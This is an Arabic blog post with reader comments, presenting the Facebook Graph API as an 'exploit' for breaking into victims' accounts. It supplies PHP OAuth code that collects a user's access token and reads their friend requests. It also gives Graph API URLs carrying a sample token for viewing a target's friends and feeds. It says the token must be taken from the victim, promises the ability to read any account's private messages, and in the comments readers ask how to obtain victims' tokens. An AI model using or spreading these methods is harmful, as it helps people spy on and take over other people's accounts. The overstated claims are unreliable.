السلام عليكم و رحمة الله تعالى و بركاته
معكم سمير سلطاني من مدونة حاسوبي
اليوم أنا جاي أشرح لكم إستغلالات ثغرة في الفايسبوك
هي صعبة قليلا لكن أتمنى أن تتجاوبوا معي
تمام نبدأ على بركة الله 
Graph API Exploit
كما يعلم الكل أن الفايسبوك يحتوي على ملايين المشتركين
و بالتالي فهو يمثل المكان الأمثل لتطبيق مخططاتنا في الإختراق
Graph API Exploitرغم أن هاته الثغرة إستغلالاتها خطيرة
و أغلب المبرمجين الآن يستغلونها في التحكم بحسابات الفايسبوك
لأن المعلومات التي تقدمها مهمة جدا
إلا أنني لا أجد لها شروحات في المنتديات هناك من سيقول أن الثغرة تافهة
أنا أقولك لا أغلب الإستغلالات بقيت خاصة بمكتشفيها و لم يتم تسريبها في المنتديات
لخطروة إستغلالاتها
فبخبرة قليلة من البرمجة تتمكن من قراءة الرسائل الخاصة لأي حساب تريد
أو إرسال رسائل بأي حساب على الفايسبوك
ما هو ال Facebook Graph Api ؟
هو الرسم البياني لل Api
أي جوهر منصة الفايسبوك
برمجة منصة الفاسيبوك مبنية على Graph api
و من يستطيع التحكم في ال api
سيتمكن من قراءة و كتابة معطيات في الفايسبوك
الآن هل تريدون اللعب بال Graph Api ؟
حقا ؟
أوكي تابعوا معي الآتي
جرب أكتب الآتي
غير Username بحساب الضحية
تطلعلك معلومات كالآتي:
كود:
{ "id": "10000000565", "name": "name of victim", "first_name": "f name", "last_name": "l name", "link": "http://www.facebook.com/victim", "username": "victim", "gender": "male", "locale": "en_GB" }
تتم قراءة طلبات الصداقة للمستهدف من خلال قراءة Graph Api عن طريق إصدار
طلب "HTTP GET" لمستخدم access_token بإذن أو رخصة read_requests
التطبيق في المتصفح كالآتي:
كود:
https://graph.facebook.com/USER_ID/friendrequests
USER_ID = username
و عن كيفية الإستغلال
عبارة عن CODE PHP بسيط يوضح الإستغلال في قراءة طلبات الصداقة للضحايا
كود PHP:
<?php
$app_id = 'YOUR_APP_ID';
$app_secret = 'YOUR_APP_SECRET';
$my_url = 'YOUR_URL';
$code = $_REQUEST["code"];
echo '<html><body>';
if(!$code) {
// Get permission from the user to publish to their page.
$dialog_url = "http://www.facebook.com/dialog/oauth?client_id="
. $app_id . "&redirect_uri=" . urlencode($my_url)
. "&scope=read_requests";
echo('**********top.location.href="' . $dialog_url . '";</script>');
} else {
// Get access token for the user
$token_url = "https://graph.facebook.com/oauth/access_token?client_id="
. $app_id . "&redirect_uri=" . urlencode($my_url)
. "&client_secret=" . $app_secret
. "&code=" . $code;
$access_token = file_get_contents($token_url);
$notifications = "https://graph.facebook.com/me/friendrequests?"
. $access_token;
$response = file_get_contents($notifications);
$resp_obj = json_decode($response,true);
echo '<pre>';
print_r($resp_obj);
echo '</pre>';
}
echo '</body></html>';
?>
كود:
https://graph.facebook.com/APP_ID/banned
كود:
https://graph.facebook.com/APP_ID/banned/USER_ID
https://graph.facebook.com = API GRAPH
بروفايل الفايسبوك المستهدف = /me/
متغير يمكننا تغييره بحسب الحاجة مثلا أردت رؤية = friendsnewsfeed أغيره إلى "home"
227470867|2.AQAV2PC0-5utxU3a.3600.1315422000.0-100000048512771|PjxTL8WUja9CKJpAgGNoFDpzdq4
يمثل ال access_token
و يجب الحصول عليه من الضحية
بما أن البعض لم يفهم عمل ال php code
هو يستعمل فقط لقراة طلبات الصداقة ..الرسائل ...
ما إلى ذلك يمكنكم التعديل عليه ليتماشى مع الحاجة
بخصوص الحصول على الـ access_token
سهل عن طريق تطبيق فايسبوك
ضروري تغيير /me/ بــ username الشخص المستهدف
و بالتالي الإستغلال يكون كالآتي :
لرؤية طلبات الصداقة للضحية
كود:
https://graph.facebook.com/me/friends?access_token=2227470867|2.AQAV2PC0-5utxU3a.3600.1315422000.0-100000048512771|PjxTL8WUja9CKJpAgGNoFDpzdq4
كود:
https://graph.facebook.com/me/home?access_token=2227470867|2.AQAV2PC0-5utxU3a.3600.1315422000.0-100000048512771|PjxTL8WUja9CKJpAgGNoFDpzdq4
يعني رؤية البروفايل
كود:
https://graph.facebook.com/me/feed?access_token=2227470867|2.AQAV2PC0-5utxU3a.3600.1315422000.0-100000048512771|PjxTL8WUja9CKJpAgGNoFDpzdq4
أتمنى أن أكون اليوم بشرحي هذا لكم قد وفقت في توضيح بعض الأمور لكم
حتى و لو كانت قليلة و لكنها مجرد بداية
ستمكنكم من دخول إختراق الفايسبوك من بابه الواسع
هي مجرد فكرة و أنتظر منكم تطوريها
شكراً
ردحذفشكرا
ردحذفرووووعه
ردحذفب
ردحذفممكن الشرح بالفيديو .?
ردحذفرووووعه
ردحذفمشكووور اخي سمير :) :)
ردحذف:) thankss samir
ردحذفمن قام بأي تطوير لهذا السكريبت يراسلني قبل ان اطرح النسخة التجريبية الثانية منه هذا الاسبوع
ردحذفمدونة تعليمية
https://www.facebook.com/dzhacker2014
GOOD
ردحذفgoog
ردحذفاخ سمير اتمنى منكم الشرح بالفيديو على كيفية الحصول على الاكسس توكن لحساب الفايسبوك للضحية المراد اختراقه .. و شكرا
ردحذفاخ سمير اتمنى منكم الشرح بالفيديو على كيفية الحصول على الاكسس توكن لحساب الفايسبوك للضحية المراد اختراقه .. و شكرا
ردحذفيوجد في هذه المدونة العديد من الشروحات للحصول عن الاكسس توكن اكتبه في مركز البحث في المدونة او شاهد هذا الشرح
ردحذفhttp://www.samir.ga/2014/05/access-token.html
جاري الاستغلال والتطوير
ردحذفشكرا
Good
ردحذفشكراااا
ردحذف